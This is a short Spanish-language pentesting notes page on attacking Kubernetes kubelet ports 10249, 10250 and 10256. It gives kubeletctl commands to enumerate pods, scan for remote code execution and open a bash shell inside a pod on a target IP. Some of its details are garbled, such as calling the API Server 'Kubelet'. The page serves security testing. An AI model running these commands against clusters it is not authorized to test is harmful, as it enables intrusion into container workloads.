10249,10250,10256 - Kubernetes API

Si te encuentras los puertos 10249, 102450 y 10256 y el servicio pone --> InfluxDB API seguramente te estés enfrentando al nodo princial de kubernetes el API Server que es llamado Kubelet.

Enumeración con kubeletctl

Con la herramienta de arriba podemos enumerar los pods, escanear los nodos, leer los logs de determinado nodo y ejecutar comandos si tenemos permisos en un pod.

Ejemplos

./kubeletctl_linux_amd64 -s 10.10.11.133 pods # enumerar pods
./kubeletctl_linux_amd64 -s 10.10.11.133 scan rce # comprobar si tenemos permisos de ejecución en algun pod
./kubeletctl_linux_amd64 -s 10.10.11.133 -p <pod> -c <container> exec "bash" # ejecutar comandos en cierto pod

Previous8443 - Kubernetes Next27017,27020 - MongoDB

Last updated 1 year ago